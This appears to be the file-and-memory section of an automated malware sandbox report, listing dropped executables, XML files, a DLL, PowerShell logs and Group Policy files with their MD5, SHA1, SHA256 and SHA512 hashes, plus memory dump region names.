MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/2328-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/2328-138-0x0000000010000000-0x0000000011000000-memory.dmp

memory/1508-141-0x0000000000000000-mapping.dmp

memory/1960-142-0x0000000000000000-mapping.dmp

memory/5116-143-0x0000000000000000-mapping.dmp

memory/4564-146-0x0000000000000000-mapping.dmp

memory/1600-147-0x0000000000000000-mapping.dmp

memory/1028-148-0x0000000000000000-mapping.dmp

memory/1816-145-0x0000000000000000-mapping.dmp

memory/1812-144-0x0000000000000000-mapping.dmp

memory/4332-149-0x0000000000000000-mapping.dmp

memory/2720-150-0x0000000000000000-mapping.dmp

memory/316-151-0x000001ABD8980000-0x000001ABD89A2000-memory.dmp

memory/316-152-0x00007FF883780000-0x00007FF884241000-memory.dmp

memory/3716-153-0x0000000000000000-mapping.dmp

memory/316-154-0x00007FF883780000-0x00007FF884241000-memory.dmp

memory/4416-155-0x0000000000000000-mapping.dmp

memory/1652-156-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/1852-162-0x0000000000000000-mapping.dmp

memory/1852-163-0x0000000001390000-0x00000000013C6000-memory.dmp

memory/1852-164-0x0000000003E20000-0x0000000004448000-memory.dmp

memory/1852-165-0x0000000004450000-0x0000000004472000-memory.dmp

memory/1852-167-0x0000000004610000-0x0000000004676000-memory.dmp

memory/1852-166-0x00000000044F0000-0x0000000004556000-memory.dmp

memory/1852-168-0x0000000004CC0000-0x0000000004CDE000-memory.dmp

memory/1756-169-0x0000000000000000-mapping.dmp

memory/4548-170-0x0000000000000000-mapping.dmp

memory/2292-171-0x0000000000000000-mapping.dmp

memory/4932-174-0x0000000000000000-mapping.dmp

memory/1812-179-0x0000000000000000-mapping.dmp

memory/1784-180-0x0000000000000000-mapping.dmp

memory/4948-182-0x0000000000000000-mapping.dmp

memory/1960-184-0x0000000000000000-mapping.dmp

memory/732-186-0x0000000000000000-mapping.dmp

memory/1056-188-0x0000000000000000-mapping.dmp

memory/1104-187-0x0000000000000000-mapping.dmp

memory/836-190-0x0000000000000000-mapping.dmp

memory/1716-192-0x0000000000000000-mapping.dmp

memory/2052-193-0x0000000000000000-mapping.dmp

memory/3052-191-0x0000000000000000-mapping.dmp

memory/4740-194-0x0000000000000000-mapping.dmp

memory/1108-189-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/4056-185-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d8e9dd53f4770d60475993f52eedf47
SHA1 70e16a001e8c0964bf458ee1ae85b3818109886c
SHA256 2bdee75c58aaa5ebb9a53fe62a04c7bf4bf4ac9d132e99b1906839b81b37650b
SHA512 c82e3538deb61b61372f364179c8f53649b571db08ed4cadca86939083068ce4c9f3ab697d7a3938dec747e2f3f91cff9feb5d9f46edee60b16c8b19bc694434

memory/4872-183-0x0000000000000000-mapping.dmp

memory/2028-181-0x0000000000000000-mapping.dmp

memory/1316-178-0x0000000000000000-mapping.dmp

memory/1524-177-0x0000000000000000-mapping.dmp

memory/204-197-0x0000000000000000-mapping.dmp

memory/3804-202-0x0000000000000000-mapping.dmp

memory/4484-201-0x0000000000000000-mapping.dmp

memory/3272-206-0x0000000000000000-mapping.dmp

memory/1828-207-0x0000000000000000-mapping.dmp

memory/5104-210-0x0000000000000000-mapping.dmp

memory/2768-211-0x0000000000000000-mapping.dmp

memory/4600-213-0x0000000000000000-mapping.dmp

memory/5048-212-0x0000000000000000-mapping.dmp

memory/1428-215-0x0000000000000000-mapping.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/1516-209-0x0000000000000000-mapping.dmp

memory/3548-208-0x0000000000000000-mapping.dmp

memory/4756-205-0x0000000000000000-mapping.dmp

memory/4512-216-0x0000000000000000-mapping.dmp

memory/316-204-0x0000000000000000-mapping.dmp

memory/3828-203-0x0000000000000000-mapping.dmp

memory/444-200-0x0000000000000000-mapping.dmp

memory/3848-199-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/3520-198-0x0000000000000000-mapping.dmp

memory/4564-176-0x0000000000000000-mapping.dmp

memory/1816-175-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/3212-173-0x0000000000000000-mapping.dmp

memory/2032-172-0x0000000000000000-mapping.dmp

memory/760-219-0x0000000000000000-mapping.dmp

memory/4248-220-0x00007FF883390000-0x00007FF883E51000-memory.dmp

memory/4724-221-0x0000000000000000-mapping.dmp

memory/1064-222-0x0000000000000000-mapping.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/4920-228-0x0000000004050000-0x00000000040D5000-memory.dmp

memory/4920-232-0x00000000048D0000-0x0000000004935000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 279c01cba658fc0ad82f3c201619656c
SHA1 d73ebfda7c8708716b10de2819a7fed64a295e60
SHA256 ac063b67eaa6a6476ab856e4bd9ff4cf79bbe831880b18eb1cbb34948c7c6cab
SHA512 cf385228df756d6fc05a52e8883e89df71dc91434255143a200d9ed5eba13ce8a3635bc82991ea38bd35531056b3d286be785b451dab638b18293477f7542a55

C:\Program Files (x86)\SvbbHukzU\xvUjymx.xml

MD5 0b70615de140d9c38dec29ee45e38c0c
SHA1 214e8ab935d92c0b80899b4f8176d7b6553ae40f
SHA256 80ee4f7231a37cef58b66032db0097dfb382bc7485cbbb7d108e0e6768d65064
SHA512 856dddb833c59cb7916d1ea71f4ed3f709b1b4de93c6aac5424ba28c8c5d2a56303c32723fe2894a6283049c305ce1c25c369dd4fc4e2969615b09a5c176679e

C:\Program Files (x86)\yOvDRBMJNKKU2\TPakwtl.xml

MD5 bca62f1dbd8ef93593f720a0c385fb4a
SHA1 221af80c09ce1aae022f845788019578e8d5e344
SHA256 0dccf83b357358e73e4994a9ec9526dcf8996aec78d3cd5c5ecff37bba0eb198
SHA512 1efebd44fbae669dfb6c48ff76fcb953e1eda0993591a4dbdc657591c5d7669a4d9090100489f3fd08371f5c95e71b120415c8e10cbf274e23c9c60905885d50

C:\ProgramData\YVKeAuHUOaLCRzVB\IveybOc.xml

MD5 99916aaab20feb22039a153723469c78
SHA1 6384215e681a3794ebcdfa587b5cc99ede536bf7
SHA256 fba97deffb211890ea12089454e72bec19c6d9352cd27779ed11de742d59a1a6
SHA512 0a819993f3de105b6c19e0d1a2a789103173b9c950a38cf3d45823f03570bc0de23e9999ba724a6a64bd9682cf5188680b4222f9f5e4dcbdb3c5fc4c07ffcb72

C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\XylehJQ.xml

MD5 b640ef0e81b7882a96e275ac13faf2e0
SHA1 a84f0304a4effd14f8e830d9a6312c453db229fd
SHA256 6f5702619d3ca3e15e316b0fbb7a5618ed4fe91796c252ec00bee3f32614b755
SHA512 5108588b929dfed97e6ada1cbf5633bd57f236db3d2acc597d6619d9d00b1c64b29aa42ef32ce9535bcd522c5ac209db52089984df028024012438d225ed216e

C:\Program Files (x86)\XYDCXZXPsTrrC\FYPpVvk.xml

MD5 875d8198ff6ec99c6b210dcd5a6b9897
SHA1 86ca980e780e2fcd138539c2b9727d9938c5e8a7
SHA256 561d617ccaf3a0beae67327cf102f683150e3ddb70881f837adf45e44f1b73eb
SHA512 8ad105ebf1fb915993c3ed0959f807c93593852c20e82805041dbe60d847ab822cdbbf9422c52e54e8f674504b46ab57c0981ddf4e7f92ff0cb44b99f286b53e

C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll

MD5 b741306fbb35688df1c40ec6572783b7
SHA1 4d8f5b3698a82cbb3007ee6a21f3df1de5a24fa7
SHA256 fe578f2302cb40e6ba3044239dd2a0c1c722f0a32b68877191dbbb10b798ee41
SHA512 6017a55935f1ac4286656a47e55adfd2896a799a436d166e6478921ed0c104caa9edc0e050f313aba544989356a3a91cc08998fc5e91dfd634a0ed419bbab927

memory/4920-242-0x0000000004940000-0x00000000049B3000-memory.dmp

memory/4920-245-0x0000000005180000-0x000000000523F000-memory.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll

MD5 b741306fbb35688df1c40ec6572783b7
SHA1 4d8f5b3698a82cbb3007ee6a21f3df1de5a24fa7
SHA256 fe578f2302cb40e6ba3044239dd2a0c1c722f0a32b68877191dbbb10b798ee41
SHA512 6017a55935f1ac4286656a47e55adfd2896a799a436d166e6478921ed0c104caa9edc0e050f313aba544989356a3a91cc08998fc5e91dfd634a0ed419bbab927

memory/1752-251-0x0000000010640000-0x0000000011640000-memory.dmp